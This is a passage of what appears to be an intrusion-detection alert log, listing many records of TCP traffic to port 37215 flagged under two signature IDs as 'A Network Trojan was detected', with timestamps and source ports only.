                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.020494
                  SID:2829579
                  Source Port:50124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.880984
                  SID:2835222
                  Source Port:52332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.821123
                  SID:2835222
                  Source Port:59042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.887347
                  SID:2835222
                  Source Port:49432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.528141
                  SID:2835222
                  Source Port:47708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.845441
                  SID:2835222
                  Source Port:56316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.821478
                  SID:2835222
                  Source Port:38678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.370948
                  SID:2829579
                  Source Port:47520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.361237
                  SID:2829579
                  Source Port:42858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.859417
                  SID:2829579
                  Source Port:45200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.526839
                  SID:2835222
                  Source Port:53196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.811617
                  SID:2829579
                  Source Port:50600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.005613
                  SID:2829579
                  Source Port:59346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.621060
                  SID:2829579
                  Source Port:43096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.624434
                  SID:2835222
                  Source Port:43422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.056548
                  SID:2829579
                  Source Port:35072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.819391
                  SID:2829579
                  Source Port:41848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.610394
                  SID:2829579
                  Source Port:39652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.660199
                  SID:2829579
                  Source Port:34810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.443855
                  SID:2835222
                  Source Port:55334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.630428
                  SID:2829579
                  Source Port:41942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.444062
                  SID:2835222
                  Source Port:55338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835988
                  SID:2829579
                  Source Port:60032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.851940
                  SID:2829579
                  Source Port:48474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.888639
                  SID:2829579
                  Source Port:53582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.384815
                  SID:2829579
                  Source Port:51786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.581630
                  SID:2835222
                  Source Port:58946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.417954
                  SID:2835222
                  Source Port:33920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.629706
                  SID:2829579
                  Source Port:53026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.191289
                  SID:2829579
                  Source Port:58006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.651509
                  SID:2829579
                  Source Port:58126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.678102
                  SID:2835222
                  Source Port:38410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:44.496105
                  SID:2835222
                  Source Port:44774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.219271
                  SID:2835222
                  Source Port:41670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.544699
                  SID:2829579
                  Source Port:48766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.533121
                  SID:2829579
                  Source Port:47208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.426350
                  SID:2835222
                  Source Port:39322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.385605
                  SID:2835222
                  Source Port:42832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.780435
                  SID:2835222
                  Source Port:55590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.275734
                  SID:2835222
                  Source Port:38588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.790225
                  SID:2835222
                  Source Port:40254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.228514
                  SID:2829579
                  Source Port:36574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.669251
                  SID:2835222
                  Source Port:57864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.213909
                  SID:2835222
                  Source Port:34384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.647511
                  SID:2829579
                  Source Port:54532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.649954
                  SID:2829579
                  Source Port:48676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.900860
                  SID:2829579
                  Source Port:57848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.924330
                  SID:2835222
                  Source Port:37684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.415648
                  SID:2835222
                  Source Port:41544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.846155
                  SID:2829579
                  Source Port:45270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.208833
                  SID:2829579
                  Source Port:42100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.868135
                  SID:2835222
                  Source Port:48546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.183998
                  SID:2829579
                  Source Port:56014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.842951
                  SID:2835222
                  Source Port:37018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.195980
                  SID:2835222
                  Source Port:49524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.121887
                  SID:2835222
                  Source Port:59398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.057474
                  SID:2829579
                  Source Port:39592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.616284
                  SID:2829579
                  Source Port:49136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.970105
                  SID:2835222
                  Source Port:47180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.992532
                  SID:2829579
                  Source Port:47048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.887224
                  SID:2829579
                  Source Port:57354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.450144
                  SID:2829579
                  Source Port:57192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.522484
                  SID:2829579
                  Source Port:51182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.609289
                  SID:2829579
                  Source Port:43620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.610218
                  SID:2835222
                  Source Port:34920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.506154
                  SID:2835222
                  Source Port:35216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.092607
                  SID:2829579
                  Source Port:52398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.124303
                  SID:2835222
                  Source Port:36190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.302695
                  SID:2829579
                  Source Port:47584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.878190
                  SID:2829579
                  Source Port:47756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.587668
                  SID:2835222
                  Source Port:44188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.976557
                  SID:2829579
                  Source Port:34172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.655556
                  SID:2829579
                  Source Port:39534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.362536
                  SID:2829579
                  Source Port:54120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.951763
                  SID:2835222
                  Source Port:41426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.941527
                  SID:2835222
                  Source Port:40538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.454505
                  SID:2835222
                  Source Port:52892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.356358
                  SID:2829579
                  Source Port:36316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.511817
                  SID:2829579
                  Source Port:36726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.795312
                  SID:2829579
                  Source Port:43774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.216046
                  SID:2835222
                  Source Port:41552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.571728
                  SID:2835222
                  Source Port:52102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.612938
                  SID:2829579
                  Source Port:55182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.522185
                  SID:2829579
                  Source Port:43010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.298148
                  SID:2829579
                  Source Port:50560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.654312
                  SID:2835222
                  Source Port:51712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.521553
                  SID:2829579
                  Source Port:33336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.556329
                  SID:2835222
                  Source Port:57338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.385136
                  SID:2835222
                  Source Port:47330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.535361
                  SID:2835222
                  Source Port:56346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.286064
                  SID:2835222
                  Source Port:60864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.869109
                  SID:2829579
                  Source Port:56274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.601191
                  SID:2835222
                  Source Port:53486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.468410
                  SID:2835222
                  Source Port:36062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.028864
                  SID:2835222
                  Source Port:45958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.234901
                  SID:2835222
                  Source Port:32986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.806143
                  SID:2835222
                  Source Port:44012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.778762
                  SID:2829579
                  Source Port:39950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.613798
                  SID:2835222
                  Source Port:50350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.929011
                  SID:2829579
                  Source Port:41600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.283182
                  SID:2835222
                  Source Port:60646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.285937
                  SID:2829579
                  Source Port:53164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.406930
                  SID:2829579
                  Source Port:37824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.525645
                  SID:2835222
                  Source Port:59994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.103598
                  SID:2835222
                  Source Port:36302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.592114
                  SID:2835222
                  Source Port:43368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.795318
                  SID:2835222
                  Source Port:47972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.822403
                  SID:2835222
                  Source Port:44584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.078993
                  SID:2829579
                  Source Port:55500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.974883
                  SID:2835222
                  Source Port:50926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.373658
                  SID:2829579
                  Source Port:46154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.933902
                  SID:2829579
                  Source Port:44538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.418151
                  SID:2829579
                  Source Port:55336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.905931
                  SID:2835222
                  Source Port:51244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.867804
                  SID:2829579
                  Source Port:60700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.632406
                  SID:2829579
                  Source Port:53650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.452507
                  SID:2835222
                  Source Port:56766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.401394
                  SID:2835222
                  Source Port:44994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.265037
                  SID:2835222
                  Source Port:50740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.519800
                  SID:2835222
                  Source Port:52448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.572202
                  SID:2835222
                  Source Port:53066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.105929
                  SID:2829579
                  Source Port:46698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.505439
                  SID:2829579
                  Source Port:47872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.231077
                  SID:2835222
                  Source Port:52498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.646410
                  SID:2829579
                  Source Port:39086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.448205
                  SID:2829579
                  Source Port:33440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.401742
                  SID:2835222
                  Source Port:53214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.471536
                  SID:2829579
                  Source Port:52482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.153663
                  SID:2835222
                  Source Port:53714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.063011
                  SID:2835222
                  Source Port:48618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.883274
                  SID:2829579
                  Source Port:49320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.985785
                  SID:2835222
                  Source Port:42938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.139461
                  SID:2829579
                  Source Port:54300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.198321
                  SID:2835222
                  Source Port:39262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.297905
                  SID:2829579
                  Source Port:58718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.424218
                  SID:2835222
                  Source Port:58068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.810148
                  SID:2835222
                  Source Port:57702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.999719
                  SID:2829579
                  Source Port:51522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.386958
                  SID:2829579
                  Source Port:33596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.774106
                  SID:2829579
                  Source Port:55122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.435819
                  SID:2835222
                  Source Port:40472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.207242
                  SID:2835222
                  Source Port:60736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.298468
                  SID:2829579
                  Source Port:42628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.805817
                  SID:2829579
                  Source Port:39540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.491692
                  SID:2835222
                  Source Port:41448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.122703
                  SID:2835222
                  Source Port:47610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.152800
                  SID:2829579
                  Source Port:52388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.753390
                  SID:2835222
                  Source Port:56664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.864839
                  SID:2835222
                  Source Port:43726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.870319
                  SID:2829579
                  Source Port:53312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.326882
                  SID:2835222
                  Source Port:51568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.911510
                  SID:2829579
                  Source Port:57398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.494991
                  SID:2829579
                  Source Port:37376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.986594
                  SID:2829579
                  Source Port:55842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.156135
                  SID:2829579
                  Source Port:38794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.048975
                  SID:2829579
                  Source Port:48726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.820536
                  SID:2829579
                  Source Port:48604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.431901
                  SID:2835222
                  Source Port:33430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.543266
                  SID:2835222
                  Source Port:45560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.429574
                  SID:2829579
                  Source Port:46156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.941160
                  SID:2829579
                  Source Port:47122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.439490
                  SID:2835222
                  Source Port:47598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.851714
                  SID:2829579
                  Source Port:52288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.433445
                  SID:2835222
                  Source Port:49888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.058736
                  SID:2829579
                  Source Port:40798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.262115
                  SID:2835222
                  Source Port:41164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.813638
                  SID:2829579
                  Source Port:59926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.223403
                  SID:2835222
                  Source Port:57132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.928325
                  SID:2835222
                  Source Port:49062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.743340
                  SID:2835222
                  Source Port:57338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.592114
                  SID:2829579
                  Source Port:59422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.636765
                  SID:2835222
                  Source Port:55430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.761554
                  SID:2835222
                  Source Port:33158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.894597
                  SID:2829579
                  Source Port:46544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.151906
                  SID:2829579
                  Source Port:50080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.146093
                  SID:2835222
                  Source Port:36456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.456446
                  SID:2829579
                  Source Port:54282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.013452
                  SID:2829579
                  Source Port:36726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.001228
                  SID:2829579
                  Source Port:48450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.847925
                  SID:2835222
                  Source Port:54334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.877679
                  SID:2835222
                  Source Port:37622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.045782
                  SID:2829579
                  Source Port:52562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.792966
                  SID:2829579
